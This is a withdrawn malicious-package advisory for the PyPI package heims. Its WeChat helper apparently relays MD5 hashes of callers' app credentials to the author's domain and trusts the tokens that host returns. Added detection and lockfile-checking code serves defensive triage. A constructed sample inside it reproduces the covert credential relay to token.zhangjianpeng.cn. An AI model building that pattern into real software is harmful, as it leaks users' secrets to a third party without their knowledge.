MAL-2026-4754

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/heims/MAL-2026-4754.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4754
Withdrawn
2026-05-26T22:13:04Z
Published
2026-05-25T05:27:16Z
Modified
2026-05-27T00:32:10.028064555Z
Summary
Malicious code in heims (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57)

The package's WechatUtil.gettoken() in src/heims/utils/wechat/wechatutil.py hardcodes a POST to https://token.zhangjianpeng.cn/ with md5(appid) and md5(appsecret) as query parameters, and uses the accesstoken returned by that third-party host for downstream WeChat API calls. The destination is a personal domain controlled by the author, not WeChat's official api.weixin.qq.com endpoint, and this third-party broker is not disclosed in the README. Multiple advertised methods (gettoken, getphoneinfo, sendtext, getmobileinfo, getqr_code) route through this host, so any caller using WechatUtil delivers MD5 hashes of its own WeChat app credentials to the author's server and then trusts the access token that server hands back for every subsequent WeChat API call. This is a silent-relay pattern: the library's documented WeChat-helper API covertly proxies caller-supplied secrets to a destination the caller did not choose. The behavior fires when the consuming application invokes the WeChat helpers, not at install or import, so install-time sandboxing or import-time monitoring alone will not observe the outbound request.
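As an added example (not code from this advisory or from the heims package), the kind of static check that surfaces a relay of the shape described above: a small Python AST scan that resolves the URL literal passed to each HTTP call, directly or through a name bound to a string, and reports any host outside an allowlist. The module it scans is constructed here to match the advisory's description and is not the package's source; the allowlist containing only api.weixin.qq.com and the set of HTTP method names it looks for are assumptions of the example.

```python
import ast
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse

# Assumption for this example: the only host a WeChat helper should talk to directly.
OFFICIAL_WECHAT_HOSTS = {"api.weixin.qq.com"}

# Method names that indicate an outbound HTTP call (requests.*, urllib.request.urlopen, ...).
# A dict.get("key") also matches the name, but "key" has no hostname and is dropped below.
HTTP_CALL_NAMES = {"get", "post", "put", "patch", "delete", "request", "urlopen"}

# Constructed sample with the shape the advisory describes; it is NOT the package's code.
SAMPLE_HELPER = '''\
import hashlib
import requests


class WechatUtil:
    def __init__(self, appid, appsecret):
        self.appid = appid
        self.appsecret = appsecret

    def gettoken(self):
        # MD5 of the caller's own credentials goes to a third-party broker.
        params = {
            "appid": hashlib.md5(self.appid.encode()).hexdigest(),
            "appsecret": hashlib.md5(self.appsecret.encode()).hexdigest(),
        }
        resp = requests.post("https://token.zhangjianpeng.cn/", params=params)
        return resp.json()["accesstoken"]

    def sendtext(self, openid, text):
        url = "https://api.weixin.qq.com/cgi-bin/message/custom/send"
        body = {"touser": openid, "msgtype": "text", "text": {"content": text}}
        return requests.post(url, params={"access_token": self.gettoken()}, json=body)
'''


def _string_bindings(tree: ast.AST) -> Dict[str, str]:
    """Names bound to a plain string literal anywhere in the module.

    Deliberately shallow (module-wide, no scoping, last write wins): enough to
    resolve `url = "..."; requests.post(url)` during triage.
    """
    bindings: Dict[str, str] = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)
                and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)):
            bindings[node.targets[0].id] = node.value.value
    return bindings


def _call_name(call: ast.Call) -> Optional[str]:
    """The attribute or bare name being called, e.g. 'post' for requests.post(...)."""
    if isinstance(call.func, ast.Attribute):
        return call.func.attr
    if isinstance(call.func, ast.Name):
        return call.func.id
    return None


def _url_argument(call: ast.Call, name: str, bindings: Dict[str, str]) -> Optional[str]:
    """Resolve the URL passed to an HTTP call, as a literal or a string-bound name."""
    pos = 1 if name == "request" else 0  # requests.request("POST", url, ...) puts the URL second
    arg = call.args[pos] if len(call.args) > pos else None
    for kw in call.keywords:
        if kw.arg == "url":
            arg = kw.value
    if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
        return arg.value
    if isinstance(arg, ast.Name):
        return bindings.get(arg.id)
    return None


def find_unexpected_endpoints(source: str, allowed_hosts=OFFICIAL_WECHAT_HOSTS) -> List[Tuple[str, int, str, str]]:
    """(enclosing function, line, method, host) for every statically resolvable
    HTTP call whose host is not in allowed_hosts."""
    tree = ast.parse(source)
    bindings = _string_bindings(tree)
    parents = {child: parent for parent in ast.walk(tree) for child in ast.iter_child_nodes(parent)}

    def enclosing(node: ast.AST) -> str:
        while node in parents:
            node = parents[node]
            if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
                return node.name
        return "<module>"

    findings = []
    for call in ast.walk(tree):
        if not isinstance(call, ast.Call):
            continue
        name = _call_name(call)
        if name not in HTTP_CALL_NAMES:
            continue
        url = _url_argument(call, name, bindings)
        host = urlparse(url).hostname if url else None
        if host and host not in allowed_hosts:
            findings.append((enclosing(call), call.lineno, name, host))
    return findings


if __name__ == "__main__":
    for func, line, method, host in find_unexpected_endpoints(SAMPLE_HELPER):
        print(f"{func}() line {line}: {method}() to non-allowlisted host {host}")
```

On the constructed sample the scan reports only the gettoken() POST to token.zhangjianpeng.cn; the sendtext() call to api.weixin.qq.com passes because its URL resolves through the `url` binding to an allowlisted host. The check is intentionally static and cheap, so a URL assembled at runtime (string concatenation, base64, config lookup) escapes it; treat an unresolvable URL in a credential-handling helper as its own reason to read the code.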

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "1.1.16"
            ],
            "sha256": "33e7dda6f116113ebe2bd1ae1ec5238d66f8ada8a87e69a90e49aac1f4eb3f57",
            "source": "amazon-inspector",
            "modified_time": "2026-05-25T05:27:16Z",
            "id": "IN-MAL-2026-004584",
            "import_time": "2026-05-26T05:52:53.21472531Z"
        }
    ]
}
References
Credits

Affected packages

PyPI / heims

Package

Affected ranges

Affected versions

1.*
1.1.16

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "heims-1.1.16-py3-none-any.whl",
            "hashes": {
                "sha256": "fb5179563d49c8bdee5f2aa87810e1c5c13606c3320931f9db3ccb3dfbd06e9b",
                "md5": "dd5f26fa99eafc47db35aeee546a5fbf",
                "blake2b_256": "0feb268d8077d510a4feba8c518f9ca078df312732485fed1fef2f85b489a29d"
            }
        },
        {
            "filename": "heims-1.1.16.tar.gz",
            "hashes": {
                "sha256": "89556c2df773eafa1dd5c3440ac3deee64ef505b8087b0b7c364f7450feb3882",
                "md5": "c0bfda4d25643c18295d90648ba3009e",
                "blake2b_256": "33882c03b3e8cda29ba6993c62831e45aa10fddc24b5ef453df8532a5cd3f8c2"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "02aef4ce9ae8ee5e74b1196c077f0e4e890f17950b26671e04afa6729d7d2cc7",
            "path": "src/heims/utils/wechat/wechat_util.py",
            "tlsh": "0f42c917ea136d46d35a48ad21ab870676387c13808c6038bdbd51cc1f8d92ba077feb"
        }
    ]
}
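To answer the question these indicators exist for, whether a project actually pins this artifact, here is an added Python example (not part of the advisory or of the osv.dev tooling) that parses a `pip-compile --generate-hashes` style lockfile and flags heims entries whose pinned version or sha256 hash matches the values listed above. The lockfile it reads is constructed for the example; the digest used for its unrelated entries is the SHA-256 of the empty string, chosen as a recognisable placeholder.

```python
import re
from typing import List, Set, Tuple

# Indicators copied from this advisory (MAL-2026-4754, PyPI/heims).
ADVISORY_ID = "MAL-2026-4754"
ADVISORY_PACKAGE = "heims"
ADVISORY_VERSIONS = {"1.1.16"}
ADVISORY_SHA256 = {
    "fb5179563d49c8bdee5f2aa87810e1c5c13606c3320931f9db3ccb3dfbd06e9b",  # heims-1.1.16-py3-none-any.whl
    "89556c2df773eafa1dd5c3440ac3deee64ef505b8087b0b7c364f7450feb3882",  # heims-1.1.16.tar.gz
}

# Placeholder digest for unrelated entries in the constructed lockfile: SHA-256 of the empty string.
PLACEHOLDER_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

# Constructed sample in `pip-compile --generate-hashes` style; not any real project's lockfile.
SAMPLE_LOCKFILE = f"""\
# constructed example lockfile
requests==2.32.3 \\
    --hash=sha256:{PLACEHOLDER_SHA256}
Heims==1.1.16 \\
    --hash=sha256:fb5179563d49c8bdee5f2aa87810e1c5c13606c3320931f9db3ccb3dfbd06e9b \\
    --hash=sha256:89556c2df773eafa1dd5c3440ac3deee64ef505b8087b0b7c364f7450feb3882
heims==1.1.17 \\
    --hash=sha256:{PLACEHOLDER_SHA256}
"""

REQUIREMENT_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9A-Za-z.+!*-]+)")
HASH_RE = re.compile(r"--hash=sha256:([0-9a-fA-F]{64})")


def normalize_name(name: str) -> str:
    """PEP 503 normalization, so Heims, heims and HEIMS compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_lockfile(text: str) -> List[Tuple[str, str, Set[str]]]:
    """(normalized name, pinned version, set of sha256 hashes) per pinned requirement.

    Backslash continuations are joined first so the --hash options that pip-compile
    puts on following lines land on the same logical line as the requirement.
    """
    entries = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment, or an option line such as -r / --index-url
            continue
        match = REQUIREMENT_RE.match(line)
        if match is None:  # unpinned or editable requirement: no single artifact to compare
            continue
        hashes = {h.lower() for h in HASH_RE.findall(line)}
        entries.append((normalize_name(match.group(1)), match.group(2), hashes))
    return entries


def check_lockfile(text: str) -> List[str]:
    """One finding per lockfile entry that matches the advisory by version or by artifact hash."""
    findings = []
    for name, version, hashes in parse_lockfile(text):
        if name != normalize_name(ADVISORY_PACKAGE):
            continue
        reasons = []
        if version in ADVISORY_VERSIONS:
            reasons.append(f"version {version} is listed as affected")
        matched = sorted(hashes & ADVISORY_SHA256)
        if matched:
            reasons.append("artifact sha256 matches " + ", ".join(h[:12] for h in matched))
        if reasons:
            findings.append(f"{name}=={version}: {ADVISORY_ID}: " + "; ".join(reasons))
    return findings


if __name__ == "__main__":
    for finding in check_lockfile(SAMPLE_LOCKFILE) or ["no entries match the advisory"]:
        print(finding)
```

Matching on the hash as well as the version matters because a mirror or vendored copy can be republished under a different version string while shipping the same bytes. The constructed heims==1.1.17 entry is not reported only because it matches neither a listed version nor a listed hash; the advisory says nothing about other versions, so absence of a finding is not a clean bill.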
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/heims/MAL-2026-4754.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]